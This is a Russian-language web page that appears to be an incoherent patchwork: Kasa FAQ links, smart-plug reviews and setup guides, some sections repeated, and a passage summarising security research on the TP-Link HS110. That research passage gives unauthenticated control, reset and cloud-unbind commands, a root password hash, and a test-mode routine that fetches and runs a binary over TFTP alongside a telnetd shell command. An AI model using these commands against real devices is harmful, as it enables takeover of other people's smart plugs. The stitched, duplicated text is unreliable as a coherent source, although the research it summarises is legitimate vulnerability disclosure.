Загрузить для hs100 v3

FAQs

  • How to use Widgets to control your Kasa Devices and Kasa Scenes and Kasa Cameras on iOS devices?
    12-17-202022973

  • What should I do if the smart plug or smart switch cannot turn on/off the appliance properly?
    12-17-20202236

  • How to connect my TP-Link Smart Plug Switch to my home network via Kasa?
    12-09-20201031920

  • What’s a TP-LINK ID and how to create a TP-LINK ID ?
    12-03-2020453339

  • Common questions about Smart Actions
    10-19-202031490

  • General questions about Kasa Smart home products
    10-15-2020126398

  • What should I do if I don’t receive the email when I register cloud account or reset my password
    07-30-202042080

  • How to reset TP-Link Kasa smart switch and plug?
    07-03-2020108025

  • How to connect your TP-Link Kasa devices to Google Home
    06-03-20201295470

  • Common questions about Schedule Away mode of smart home product?
    03-02-202012549

  • What should I do if I fail to configure the Kasa device?
    12-09-201972352

  • How to make Kasa smart devices controlled local only
    11-25-201927399

  • How to make my TP-Link Kasa Device work with Amazon Alexa?
    11-19-20191977315

  • How to use the Grouping feature in Kasa app
    11-05-201926525

  • What should I do if schedule not working properly for Kasa smart devices
    10-30-201920509

  • Some frequently asked questions about TP-Link smart plug and smart switch
    10-18-2019288866

  • What should I do if my smart plug feels warm?
    10-10-20197520

  • Do TP-Link smart plug and switch support Single pole or Double pole?
    10-10-20196639

  • How do I move my Kasa device to a different wireless network?
    09-27-2019126956

  • How to create a TP-Link Cloud Account on Kasa app?
    09-19-2019312154

  • How to unbind cloud account with devices in mobile App
    09-19-201946652

  • How to configure the Kasa device to work with SmartThings App?
    08-14-2019316237

  • How to setup schedule, away mode and timer of TP-Link Smart Plug/Switch in Kasa APP?
    07-30-2019213597

  • How to Use Siri to Control Your Kasa Smart Devices
    07-05-2019127294

  • How to Adjust Time Setting in the KASA app
    05-27-201947908

  • How to make wireless password visible and continue the configuration of Smart Devices in Kasa App?
    05-27-201914828

  • How to use Scenes function in Kasa app?
    05-27-201939113

  • What can I do if I forget my password of TP-Link Cloud account?
    05-27-201960807

  • How to find the firmware of your smart home device in the Kasa app?
    05-23-201922918

  • How to update firmware of Smart Devices in Kasa App?
    05-17-201994252

  • How to use Sunrise & Sunset function
    05-13-201984215

  • What should I do if my Kasa device doesn’t synchronize the time correctly?
    04-18-201953015

  • How to control Smart Devices by Amazon Echo with voice commands?
    04-18-2019103235

  • How to control Smart Devices by Google Home with voice commands
    02-26-2019104094

  • How to Link your TP-Link Kasa Account to Google Assistant (Smartphone App)
    01-14-201915536

  • How to use Widgets to control your Kasa devices and Kasa scenes on Android devices?
    11-02-201814546

Принцип работы «умной» wi fi розетки

При соединении розетки с роутером прибор получает уникальный IP-адрес. Закрепленный адрес позволяет связываться с другими объектами через интернет. Сигнал кодируется, что позволяет защитить устройство от несанкционированного доступа. Настройки хранятся на сервере или в устройстве. В первом случае статистика и данные сохранны надёжно, а вот во втором, при разрыве связи потребуется их восстановление.

Программы находятся в свободном доступе и устанавливаются на управляющее устройство – любой современный гаджет.

С датчиком температуры воздуха

Устройство с термодатчиком обойдутся дороже других альтернатив, но они обеспечат безопасность для вашего дома. Датчик делает замеры и контролирует показатели температуры окружающей среды. Если фиксируется превышение нормы, что может быть причиной пожара или короткого замыкания. Умный прибор моментально отключит приборы от питания и отправит сообщение владельцу смартфона.

Управление «умный дом»

Концепция «умного дома» появилась давно. Владелец такого дома управляет оборудованием, используя программу, установленную в телефоне. Чтобы начать использовать розетку, необходимо завести в «облаке» аккаунт, что рекомендует производитель.

Если этого не сделать, то пользователю будут доступны только базовые функции – включения и выключения электроприборов. Дополнительный функционал будет доступен после регистрации.

После запуска приложения для умных устройств, добавляется гаджет. Каждая умная розетка подписывается именем и загружается изображение. Такой подход упрощает навигацию по дому, особенно если таких приборов много.

Управление некоторыми моделями возможно за счет популярных голосовых ассистентов Amazon Echo и Google Home. Но команды подаются на английском языке. Управление «умный дом» позволяет создавать расписание и включать режим «Away», который позволяет сымитировать присутствие хозяев в доме, когда их на самом деле нет.

Приборы часто отслеживают показатели электропотребления, что позволяет делать прогнозы по расходам на этот ресурс. Такое умное устройство позволяет контролировать другие приборы, жизнь становиться комфортнее.

Полезное видео

Компания TP-Link недавно представила новые устройства. Умные розетки TP-Link HS110 и HS100. Более подробно об этих розетках я рассажу в отдельной статье, а сегодня мы будем их устанавливать и настраивать. Если вы уже стали счастливым обладателем розеток HS100, или HS110, то эта инструкция может вам пригодится. А возможно, вам просто будет интересно посмотреть, что это за устройства, как они настраиваются и работают. Устройства новые и необычные. Я уже несколько дней тестирую эти розетки, и у меня есть что вам рассказать и показать.

Модели TP-Link HS100 и TP-Link HS110 практически одинаковые. Только старшая модель (HS110) умеет следить за расходом электроэнергии. Статистика потребления электроэнергии за все время и в режиме реального времени.

Сами устройства созданы для удаленного управления электроприборами. Включаем умную розетку в обычную розетку:), и уже к ней подключаем какой-то электроприбор: обогреватель, лампу, вентилятор, что угодно. И через приложение Kasa с телефона можно удаленно управлять этим электроприбором (включать и отключать его)
. Так же в программе можно навастривать таймер включения/отключения, и просматривать статистику по расходу электроэнергии (если у вас модель HS110)
.

Еще один важный момент: управлять умной розеткой можно не только когда вы находитесь у себя дома. Розетка подключена к вашему роутеру. А вы с телефона можете получать доступ к розетке с любого места. Главное, чтобы на телефоне был интернет.

Опыт использования

Зачем платить почти $30 за розетку? Думаю, многие из вас сталкивались с необходимостью возвращаться домой из-за забытого утюга. И таких ситуаций бесчисленное количество.

Чтобы ваши нервы остались в покое, а квартира не сгорела, компания TP-Link выпустила две модели смарт розеток: HS100 и HS110. Они позволяют удаленно управлять подключенными в сеть устройствами и настраивать автоматические сценарии работы.

Внешне розетки почти идентичны, только у старшей модели гнездо белого цвета, а у младшей — серого.

К внешнему виду устройств у меня никаких вопросов. Корпус простой и лаконичный, выполненный из белого пластика, он впишется практически в любой интерьер.

Приятной особенностью стали закругленные края основания, которые, благодаря своей форме, не закрывают соседние розетки. Для подобных продуктов это частая проблема, а тут прям молодцы.

На корпусе устройств присутствуют две клавиши управления: одна отвечает за включение, а вторая — за перевод розетки в режим настройки.

С ней справится даже ребенок. Установив фирменное приложение Kasa, перед вами появится интерактивное руководство, способное ответить практически на все возникающие вопросы. А если что-то все равно пойдет не так, есть расширенный раздел справки по настройке.

После всех необходимых действий розетка подключится к Wi-Fi сети и станет доступна в приложении. Если при первой настройке вы не создали личный аккаунт, розетками можно будет управлять только локально.

Приложение Kasa создано для большинства смарт-вещей производства TP-Link, так что все устройства будут доступны в одном месте. Добавленные розетки можно кастомизировать по своему усмотрению. На выбор пользователя есть настраиваемые сценарии работы, переименование, назначение автоматического включения, изменение картинки или даже присвоение фотографии подключенному устройству.

Все это позволяет гибко настраивать розетку под свой режим дня. Например, за пол часа до прихода домой можно включить кондиционер или настроить устройство на автоматическое включение чайника каждое утро. Главное, что все пункты управления сделаны максимально доступно и понятно. Единственным недостатком для некоторых может стать отсутствие локализации, которую обещают добавить в скорых обновлениях. Правда, для работы с приложением хватит и базового английского.

Устройства TP-Link HS100 и HS110 можно подключать практически ко всему. Розетки выдерживают нагрузку до 16 А и могут проводить через себя мощность до 3,68 кВт. Так что большинство бытовых приборов будут работать без проблем.

Видео по настройке

  • Quick Tips: How to Link your Kasa Account to Google Assistant

    This video will show you how to how to link your Kasa Account to Google Assistant for voice control.

  • Quick Tips: How to Link your Kasa Account to Amazon Alexa

    This video will show you how to how to link your Kasa Account to Google Assistant for voice control.

  • This video will show you how to Setup the Smart Actions feature in the Kasa App.

  • This video will show you how to create a schedule for the device in the Kasa App.

  • This video will show you how to set your time zone in the Kasa App.

  • This video will show you how to create a group of devices in the Kasa App.

Как работает Вай Фай от розетки?

Работа контролируется встроенным микропроцессором. Процессор координирует работу с управляющим устройством – гаджетом с установленным приложением. На рынке представлены и более сложные модификации с сетевыми адаптерами на 4 разъема, но такие варианты не всем подходят.

Вай Фай от розетки позволяет выполнять такие функции:

  1. Влючать и отключать электроприборы на расстоянии.
  2. Контролировать количество используемой электроэнергии.
  3. Перезагружать электроприборы.
  4. Устанавливать таймер для управления устройствами.
  5. Наличие датчика температуры обеспечивает пожаробезопасность.

Перед подключением прибора, стоит убедиться в том, что его мощность ниже мощности розетки. Такая информация предоставляется в техническом паспорте оборудования.

АНАЛИЗ КОМАНД ПРОТОКОЛА TP-LINK SMART HOME

Авторы опубликовали полный список (txt) JSON-команд и Python-клиент для их отправки.

Системные команды:

Получить информацию о системе:

{"system":{"get_sysinfo":{}}}

Через написанный Python-клиент это будет так:

./tplink-smartplug.py –t 192.168.0.1 –c info

Или можно отправлять свои JSON-команды:

./tplink-smartplug.py –t 192.168.0.1
    –j '{"system":{"get_sysinfo":{}}}'

Результат выполнения команды get_sysinfo в TP-Link HS110 Wi-Fi

Чтобы включить или выключить, используется команда set_relay_state со значением 1 и 0 соответственно:

{"system":{"set_relay_state":{"state":1}}}

Перезагрузка через определенное время:

{"system":{"reboot":{"delay":1}}}

Сброс настроек до заводских и превращение в точку доступа:

{"system":{"reset":{"delay":1}}}

А если вспомнить, что у устройства нет аутентификации в сети, то получается, что любой пользователь Wi-Fi-сети может выполнить все указанные команды. Напомню про ссылку выше, по ней полный список команд ;-).

Из интересного стоит еще отметить команду установки прошивки. Загружается она с произвольного URL-адреса:

{"system":{"download_firmware":{"url":"http://..."}}}

Состояние загрузки можно получить через команду get_download_state:

{"system":{"get_download_state":{}}}

А для установки используется flash_firmware:

{"system":{"flash_firmware":{}}}

Просто так установить модифицированный образ не получится, поскольку он должен быть подписан одним из четырех захардкоженных RSA-ключей:

Захардкоженные RSA-ключи для прошивки TP-Link HS110 Wi-Fi

Wi-Fi-команды

Умную розетку можно еще использовать для сканирования ближайших точек доступа:

{"netif":{"get_scaninfo":{"refresh":1}}}

Эта команда вернет полный список.
Подключиться к нужной точке доступа с необходимыми параметрами:

{"netif":{"set_stainfo":{"ssid":"WiFi","password":"123",
    "key_type":3}}}

Напомню, что все JSON-команды можно выполнять вне зависимости от состояния устройства. То есть в обычное время подключение к нужной сети требуется только для несконфигурированного состояния — когда умная розетка в режиме точки доступа.

Облачные команды

Умная розетка постоянно пытается соединиться с сервером TP-Link по адресу devs.tplinkcloud.com:50443, используя TLS. Это поведение сохраняется, даже если в Kasa установлена настройка работать только локально. Но мы можем изменить адрес сервера на нужный нам следующей командой:

{"cnCloud":{"set_server_url":{"server":"devs.tplinkcloud.com"}}}

Только не забудь, что там должен быть действительный сертификат от Symantec EV Root CA.

Далее можно зарегистрировать устройство в облаке:

{"cnCloud":{"bind":{"username":alice@home.com, "password":"secret"}}}

И отвязать:

{"cnCloud":{"unbind":null}}

С помощью этих команд атакующий может отвязать устройство и изменить владельца. Еще он может перехватить регистрационные данные, отправляемые Kasa-приложением.

Ищем устройства TP-Link через Device Debug Protocol:

TP-Link Device Debug Protocol — запатентованный в Китае протокол TP-Link, в котором описывается, как устроены TDDP-пакеты. Этот протокол используется для пинга и поиска устройств TP-Link в сети посредством широковещательных сообщений, чтения и установки опций и выполнения специальных команд. Целостность TDDP поддерживается с помощью MD5, встроенного в заголовок каждого пакета:

структура TDDP пакета

Полезная нагрузка пакета также шифруется с помощью DES. Это означает, что любые читаемые или записанные настройки будут зашифрованы. DESключ устанавливается как половина (16 шестнадцатеричных чисел, или 8 байт) MD5-хеша от конкатенации имени пользователя и пароля устройства:

md5(username + password)

Так как HS110 не поддерживает какую-либо аутентификацию, то имя пользователя и пароль были захардкожены в shd-файл:

Захардкоженные имя пользователя и пароль устройства для создания DES-ключа

Для остальных устройств TP-Link можно проверить эти же данные или провести брутфорс-атаку по логину. С помощью одного UDP-пакета авторы смогли получить некоторую информацию об устройстве. Для воспроизведения нескольких интересных случаев было написано несколько скриптов («тестовая» строка, deviceID и hardwareID):

Пример TDDP запроса

Настраиваем голосовое управление умной розеткой

Перед началом настройки, убедитесь, что на вашей умной розетке включён .

Для того, чтобы связать розетку от TP-Link с Google Ассистентом вам понадобиться приложение . Ниже по шагам расскажем как добавить голосовое управление через другого помощника – Alexa в умных колонках :

  1. Приложение Amazon Alexa пока не доступно в России. Мы рекомендуем настраивать через десктопную версию alexa.amazon.com . Есть и другие способы, но они менее удобны. Если у вас Android – вы можете воспользоваться статьёй . Если у вас iOS, то вам понадобиться учётная запись в американском App Store.
  2. В главном меню нажмите «Smart Home». В открывшейся вкладке нажмите «Smart Home Skills».
  3. Нажмите «Enable Skills».
  4. Введите «Kasa» в строке поиска. Затем нажмите на «TP-LINK Kasa».
  5. Нажмите Enable.
  6. Войдите в свою учетную запись Kasa и нажмите «Authorize».
  7. Закройте вкладку.
  8. Нажмите «Discover Devices» или используйте голосовую команду «Alexa, discover devices». Вы также можете добавить новое устройство на вкладке «Smart Home» в разделе «Devices» нажав «Discover».
  9. Дождитесь завершения обнаружения устройства.
  10. Поздравляем! Вы завершили процесс настройки. Все обнаруженные устройства можно контролировать с помощью умных колонок Amazon Echo со встроенным голосовым ассистентом Alexa. Попробуйте управлять розеткой с помощью голосовых команд. Например, если умная розетка tp-link называется «Smart Plug», чтобы включить её вы можем сказать «Alexa, turn on Smart Plug» и проверить, работает ли голосовое управление через Alexa.

Управляйте домашним комфортом независимо от расстояний

Дистанционное включение и выключение бытовой техники с помощью смартфона

При наличии интернет-соединения на смартфоне вы можете управлять домашними приборами из любого места, где бы вы ни находились. А в сочетании с роутером Xiaomi вам доступна возможность устанавливать те или иные сценарии использования умной розетки. Например, перед уходом с работы вы можете заранее дистанционно с помощью смартфона запустить мультиварку, включить свет в прихожей, очиститель воздуха или водонагреватель, чтобы, вернувшись домой после тяжелого трудового дня, сразу окунуться в атмосферу тепла и уюта.

Безопасность превыше всего

Мобильный мониторинг состояния подключенной техники
Дистанционное включение и выключение

Вам больше не придется, покидая дом, переживать о невыключенных электроприборах. С помощью приложения «Xiaomi Smart Home» вы можете в любое время проверять состояние подключенного прибора и управлять его электропитанием. Это не только позволит снизить энергопотребление и обеспечит безопасность, но и повысит уровень комфорта в вашей жизни.

Научный подход к потреблению энергии

Запланируйте работу вашей домашней техники

Функция таймера не только уменьшает потребление энергии, что положительно сказывается на окружающей среде, но и делает использование бытовых приборов еще удобнее, при этом продлевая срок их службы. Например, вы можете установить таймер для обогревателя, который будет автоматически выключаться после вашего ухода на работу и включаться за полчаса до возвращения домой, обеспечивая комфортную температуру при нахождении дома.

Компактный размер для одновременного использования
сразу нескольких розеток

Благодаря оптимизированному дизайну и улучшенной организации внутренних компонентов розетки ее размер позволяет одновременно подключать в сетевой фильтр сразу несколько умных розеток, что дает возможность управлять дистанционно еще больших количеством бытовых приборов.

Сложные производственные технологии

Корпус розетки выполнен из огнестойкого материала, способного выдерживать температуру до 750°С, и изготовлен при помощи технологии волновой пайки. Качество сборки умной розетки Xiaomi одобрено национальным стандартом качества CQC. Розетка имеет встроенный датчик температуры, который осуществляет мониторинг работы высокомощных приборов и контролирует внутреннюю температуру розетки, и при значительном повышении температуры отправляет соответствующее уведомление пользователю. При перегреве розетка автоматически приостановит подачу тока во избежание возгорания и поломки.

С помощью мобильного приложения «Xiaomi Smart Home» можно легко и просто управлять умной розеткой Xiaomi

WI-FI розетки являются частью «умного дома» и с каждым годом их активно устанавливают в современных домах, что объясняется практичностью и комфортом, который создает изделие.

СКАНИРОВАНИЕ ПОРТОВ

Запустив Nmap после сканирования всех TCP и UDP, получили следующее:• 80/tcp — HTTP; • 9999/tcp — TP-Link Smart Home Protocol; • 1040/udp — TP-Link Device Debug Protocol (TDDP).

Веб-сервер на 80-м порту отвечает бессмысленными троеточиями, вне зависимости от запроса:

HTTP/1.1 200 OK
Server: TP-LINK Smart Plug
Connection: close
Content-Length: 5
Content-Type: text/html
...

Внутри shd этот ответ HTTP-сервера зовется fake_httpd и всегда возвращает захардкоженный ответ.

TCP-порт 9999 используется для управления умной розеткой в локальной сети с помощью приложения Kasa и описан в TP-Link Smart Home Protocol, а UDPпорт 1040 — в TP-Link Device Debug Protocol.

Настраиваем голосовое управление умной розеткой

Перед началом настройки, убедитесь, что на вашей умной розетке включён .

Для того, чтобы связать розетку от TP-Link с Google Ассистентом вам понадобиться приложение Google Home. Ниже по шагам расскажем как добавить голосовое управление через другого помощника – Alexa в умных колонках Amazon Echo:

  1. Приложение Amazon Alexa пока не доступно в России. Мы рекомендуем настраивать через десктопную версию alexa.amazon.com. Есть и другие способы, но они менее удобны. Если у вас Android – вы можете воспользоваться статьёй как установить приложение Alexa на Android. Если у вас iOS, то вам понадобиться учётная запись в американском App Store.
  2. В главном меню нажмите «Smart Home». В открывшейся вкладке нажмите «Smart Home Skills».
  3. Нажмите «Enable Skills».
  4. Введите «Kasa» в строке поиска. Затем нажмите на «TP-LINK Kasa».
  5. Нажмите Enable.
  6. Войдите в свою учетную запись Kasa и нажмите «Authorize».
  7. Закройте вкладку.
  8. Нажмите «Discover Devices» или используйте голосовую команду «Alexa, discover devices». Вы также можете добавить новое устройство на вкладке «Smart Home» в разделе «Devices» нажав «Discover».
  9. Дождитесь завершения обнаружения устройства.
  10. Поздравляем! Вы завершили процесс настройки. Все обнаруженные устройства можно контролировать с помощью умных колонок Amazon Echo со встроенным голосовым ассистентом Alexa. Попробуйте управлять розеткой с помощью голосовых команд. Например, если умная розетка tp-link называется «Smart Plug», чтобы включить её вы можем сказать «Alexa, turn on Smart Plug» и проверить, работает ли голосовое управление через Alexa.

Посмотреть полный список голосовых команд для Amazon Echo вы можете в статье .

Настройка и управление умной розеткой TP-Link Tapo P100

После подключения на главном экране приложения Tapo отобразится наша умная розетка TP-Link. Уже отсюда можно включить ее или выключить, нажав на соответствующий значок.

Если же тапнуть по всему блоку, то попадаем в детальные настройки P100. Здесь отображается текущее состояние розетки. А также в отдельном блоке — настройка режимов ее работы.

Рассмотрим их подробнее.

  • Расписание — здесь мы можем задать конкретные дни и время работы розетки.

    Есть возможность выбрать определенные дни недели, часы или чтобы она автоматически работала в определенное время суток. Удобно, если вы подключаете к розетке осветительный прибор.

  • Режим «Нет дома» — интересен тем, что розетка будет в хаотическом порядке то включаться, то выключаться. Тем самым имитируя присутствие в квартире жильцов для отпугивания потенциальных воров.

    Для него также можно задать собственное расписание работы.

  • Таймер — установка обратного отсчета, после которого умная розетка включится или перестанет работать

Ну и разумеется, все эти функции можно выставлять не только вручную из мобильного приложения, но и при помощи поддерживаемых голосовых ассистентов. Например, «Алекса, отключи утюг через 3 минуты» или «ОКей, Гугл, поставь торшер в режим нет дома на завтра».

Настройка удалённого доступа (Remote Control)

По умолчанию удалённый доступ включён. Если у вас проблемы с управлением розеткой из приложения, то проверьте, не выключили ли вы случайно Remote Control:

  1. Заходим в список устройств “Devices” (устройства) и нажимаем на розетку (не на значок включения и выключения, а левее).
  2. Откроется окно с различными возможностями умной розетки. Нажимаем на значок шестерёнки.
  3. Откроется окно с основными настройками розетки. Для включения удаленного доступа к розетки tp-link нажимаем на переключатель “Remote Control” (Удаленный Доступ) – он должен загореться зелёным. Здесь же вы можете поменять имя устройства (Device Name), изменить значок устройства (Device Icon).

Видео по настройке

  • Quick Tips: How to Link your Kasa Account to Google Assistant

    This video will show you how to how to link your Kasa Account to Google Assistant for voice control.

  • Quick Tips: How to Link your Kasa Account to Amazon Alexa

    This video will show you how to how to link your Kasa Account to Google Assistant for voice control.

  • This video will show you how to Setup the Smart Actions feature in the Kasa App.

  • This video will show you how to create a schedule for the device in the Kasa App.

  • This video will show you how to set your time zone in the Kasa App.

  • This video will show you how to create a group of devices in the Kasa App.

НАСТРОЙКА УСТРОЙСТВА

Умная розетка имеет только две физические кнопки — переключатель «Вкл./ выкл.» и кнопку перезагрузки, которая сбрасывает настройки устройства, если ее держать нажатой более пяти секунд. После включения ненастроенное устройство с заводскими настройками запускает незащищенную точку доступа с именем вида TP-LINK_Smart Plug_XXXX, где XXXX — четыре шестнадцатеричных числа. После быстрого поиска в WiGLE было найдено несколько умных розеток TP-Link с настройками по умолчанию:

Список умных розеток TP-Link с настройками по умолчанию из WiGLE

А это, в свою очередь, означало, что рано или поздно подобные устройства попадут под прицелы исследователей ИБ — это лишь вопрос времени. Сегодня мы рассмотрим уязвимости в одном из таких устройств — умной Wi-Fi-розетке TP-Link HS110 Wi-Fi.

Приложение от TP-Link для управления такими устройствами — Kasa подключает смартфон к созданной точке доступа, отправляя широковещательные UDP-пакеты 255.255.255.255 для поиска IP-адреса устройства и последующей установки имени SSID и пароля, которые пользователь ввел в приложении. Затем умная розетка выключает точку доступа и соединяется с указанной Wi-Fi-сетью как клиент.

Авторы провели KARMA-атаку, используя MANA Toolkit от SensePost, принудительно деаутентифицировав умную розетку и попытавшись соединиться небезопасной поддельной точкой доступа с тем же именем. Увы, атака не увенчалась успехом, хотя таким образом можно вызывать временный отказ от обслуживания устройства.

Кстати, не только умные розетки подключаются подобным способом, но и другие устройства. Например, популярный (и неоправданно дорогой) комбайн LIFX настраивается посхожемуалгоритму.

ИССЛЕДУЕМ ПРОШИВКУ TP-LINK HS110

Следующим шагом авторы скачали официальную прошивку для устройства HS110(US)_V1_151016.zip и натравили на него binwalk для анализа содержимого.

Как видишь, прошивка содержит обычную Linux-систему, состоящую из трех частей:

• U-Boot Bootloader 1.1.4 (Oct 16 2015 — 11:22:22);
• Linux Kernel 2.6.31 — LSDK-9.2.0_U11.14 (yt@yangtao.localdomain);
• Squashfs filesystem.

В файловой системе авторы нашли следующие интересные файлы:
1. /bin/busybox v1.01 (2015.10.16 — 03:17+0000).
2. /etc/newroot2048.crt — этот сертификат используется для проверки облачного сервера. Файл содержит корневой сертификат VeriSign Class 3 Public Primary Certification Authority — G5. Это означает, что при установлении TLS-соединения в облако проверяется, подписан ли предоставленный сервером сертификат с помощью Symantec VeriSign CA for Extended Validation (EV) certificates (CA pinning). Атакующий может купить себе собственный EV-сертификат и использовать его для своего сервера, чтобы он «выглядел» как облако.

3. /etc/shadow — после дешифрования оказалось, что пароль media root:7KBNXuMnKTx6g:15502:0:99999:7:::

4. /usr/bin/shd — основное серверное приложение.
5. /usr/bin/shdTester — клиент для калибровки экрана энергии.
6. /usr/bin/calDump — дамп данных калибровки из /dev/caldata.

Вся проприетарная серверная логика находится в исполняемом файле shd (Smart Home Daemon), который является MIPS32 R2 Big Endian:

shd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV),
dynamically linked, interpreter /lib/ld-uClibc.so.0,
corrupted section header size

Также в нем содержится OpenSSL 1.0.1j 15 Oct 2014 для установки TLS-соединения с облачным сервером.

Подключение розетки TP-Link Tapo P100 к интернету по wifi

Включение и выключение розетки можно производить удаленно через интернет с помощью мобильного приложения. Такой способ связи доступен благодаря встроенной поддержке облачного сервиса TP-Link. Tapo P100 подключается к домашнему wifi роутеру и через него связывается с сервером в интернете.

Кроме того, она еще может быть включена в целую систему умного дома. А значит, ее включение-выключение можно запрограммировать на срабатывание целой цепочки действий. Например, чтобы прибор выключился после активации режима охраны или при срабатывании неких датчиков — температуры, дыма, движения и т.д.

Кстати, у TP-Link есть смежная линейка умных устройств, выпускаемая под брендом Kasa. В их числе умная лампочка Smart Bulb, обзор на которую мы уже делали ранее.

Установка приложения Tapo на телефон

Для работы с розеткой необходимо установить приложение на смартфон. Оно так и называется «Tapo» — можно найти в AppStore или Play Market или же отсканировать QR код камерой телефона.

Далее необходимо зарегистрировать нового пользователя или использовать уже существующую учетную запись в облачном сервисе TP-Link ID.

Подключение розетки Tapo P100 к смартфону

После авторизации приложение Tapo предложит принять условия использования и запросит доступ к bluetooth модулю смартфона. Смело даем разрешение — ведь именно по блютуз происходит первое подключение и настройка умной розетки TP-Link.

На главной странице пока пусто. Мы же нажмем на «плюсик», чтобы добавить новое устройство.

Выбираем из списка гаджетов умного дома TP-Link «Умную розетку»

Теперь можно подключить TP-Link Tapo P100. Для этого достаточно вставить ее в обычную настенную розетку или сетевой фильтр. Индикатор на ней начнет мигать оранжевым, что означает, что она готова к настройке. Подтверждаем это на телефоне.

И ждем, пока умная розетка по Bluetooth подключится к смартфону. Приложение оповестит об успешном обнаружении

Подключение Tapo P100 к WiFi сети

Далее необходимо будет подключиться к wifi роутеру для того, чтобы иметь возможность управлять умной розеткой Tapo P100 удаленно через интернет. Для этого выбираем имя своей сети

И вводим от нее пароль

Соединения занимает буквально несколько секунд

На последнем шаге жмем на кнопку «Готово» в приложении.

ИССЛЕДУЕМ TP-LINK SMART HOME PROTOCOL

Прослушав локальный Wi-Fi-трафик, авторы увидели, что мобильное приложение общается с HS110 через порт 999, используя данные, похожие на зашифрованные. После декомпиляции Android-приложения они нашли функцию шифрования:

Функция шифрования в мобильном приложении Kasa от TP-Link

Мы видим, что инициализирующий ключ (вектор) — это захардкоженное значение -85 (= 171). Первый байт открытого текста ксорится (XOR) с этим ключом. Затем ключ ставится в незашифрованный байт. В ходе очередной итерации следующий байт открытого текста ксорится с предыдущим байтом открытого текста. Дешифровка работает по тому же принципу.

Этот алгоритм известен как autokey cipher. Несмотря на то что его статические свойства лучше, чем в стандартном XOR-шифровании с помощью повторяющегося ключа, он все равно может быть легко взломан известными атаками.

Теперь, когда мы знаем алгоритм и ключ, мы можем сделать Wireshark-диссектор на Lua, который автоматически дешифрует TP-Link Smart Home пакеты на 9999-й порт. Сам протокол устройства использует JSON, так что можно добавить и диссектор для него. В итоге мы можем читать данные между Kasa-приложением и умной розеткой в Wi-Fi-сети.

Реализованный Wireshark-диссектор для протокола TP-Link Smart Home

Команды для умной розетки сгруппированы в следующие категории:
• system;
• netif (WLAN interface commands);
• cnCloud (соединение с облаком);
• time;
• emeter (измерение энергии);
• schedule (расписание вкл./выкл.);
• count_down (таймер вкл./выкл.);
• anti_theft (рандомное расписание вкл./выкл.).

ТЕСТОВЫЙ РЕЖИМ

После дальнейшего анализа авторы нашли скрытый тестовый режим. Его видно в параметрах командной строки shd-файла:

Параметры запуска shd

Этот параметр запускает функцию wlan_start_art, которая, в свою очередь, запускает Atheros Radio Test (ART) для тестирования производительности Wi-Fi-адаптеров Atheros.

Функция wlan_start_art выполняет следующие команды:

LD_LIBRARY_PATH=/tmp
arping –I br0 –c 1 192.168.0.100
tftp –g 192.168.0.100 –r ap_bin/ap121/art.ko
    –l /tmp/art.ko
insmod /tmp/art.ko
tftp –g 192.168.0.100 –r ap_bin/ap121/nart.out
    –l /tmp/nart.out
chmod +x /tmp/nart.out
/tmp/nart.out –instance 0 &

Эти команды соединяются с FTP-сервером, скачивают файл nart.out, делают его исполняемым и запускают. Для успешной эксплуатации достаточно сделать shell-скрипт с таким именем и расположить по нужному адресу. Достаточно даже будет запустить демон telnetd:

/bin/busybox telnetd –l/bin/sh &

Кстати, запуск этого режима возможно сделать удаленно. Для этого есть JSON-команда set_test_mode:

./tplink-smarthome.py -t 192.168.0.1
    -j '{"system":{"set_test_mode":{"enable":1}}}'

В память устройства будет установлен специальный флаг, который проверяется в процессе загрузки. Поэтому нужно перезагрузить устройство:

./tplink-smarthome.py -t 192.168.0.1 -c reboot

После этого устройство попытается соединиться с сетью hs_test и паролем 12345670.

Данные для «тестовой» сети

Для установки точки доступа hs_ test авторы использовали hostapd со следующим конфигурационным файлом hostapd.conf:

interface=wlan0
driver=nl80211
ssid=hs_test
wpa=2
wpa_passphrase=12345670
channel=1

Увы, но здесь разработчики подсуетились. Поведение в тестовом режиме не отличается от стандартного. Хотя в коде и есть обращение к wlan_start_art, но загрузки и исполнения скрипта не происходит. Возможно, эти строки были закомментированы.

Обзор характеристик и внешнего вида TP-Link Tapo P100

Об одной такой умной мини розетке с WiFi мы и поговорим в сегодняшнем обзоре. Это модель от TP-Link, Tapo P100.

Об основных технических характеристиках можно узнать уже из информации на упаковке.

  • Удаленное управление через мобильное приложение
  • Расписание работы
  • Таймер
  • Поддержка голосового ассистента Amazon Alexa или Google Assistant
  • Режим «вне дома»

Мы их рассмотрим более подробно ближе к концу статьи при детальном разборе мобильного приложения. QR для его загрузки указан здесь же на коробке.

Внутри находим только розетку Tapo P100 и краткую инструкцию. По большому счету, больше ничего и не нужно.

Само устройство представляет из себя довольно тяжелую квадратную коробочку. Вилка с толстыми штырями, так что можно предположить, что розетка рассчитана на приличную нагрузку для подключения к ней мощного бытового прибора.

На лицевой части логотип и световой индикатор состояния подключения розетки к wifi сети. Сбоку физическая кнопка включения.

BUSYBOX

Предоставляемая версия BusyBox из прошивки подвержена уязвимости CVE2011-2716, инъекции команд в компоненте udhcpc (DHCP-клиенте). Она позволяет внедрять команды в одну из следующих DHCP-опций:• (12) Hostname;• (15) Domainname; • (40) NIS Domain; • (66) TFTP Server Name.

Проанализировав исполняемый файл, авторы нашли, что shd создает shellскрипт /tmp/udhcpc.script:

#!/bin/sh
if
then
    ifconfig $interface $ip netmask $subnet
    route del default
    route add default gw $router
    echo "nameserver $dns" > /tmp/resolv.conf
fi

а затем выполняется udhcpc:

/sbin/udhcpc –b –H "HS100(US)" –i br0 –s /tmp/udhcpc.script

К сожалению, здесь hostname захардкожена, а другие опции не используются. Так что уязвимость неэксплуатируема.

Оцените статью
Рейтинг автора
5
Материал подготовил
Илья Коршунов
Наш эксперт
Написано статей
134
Добавить комментарий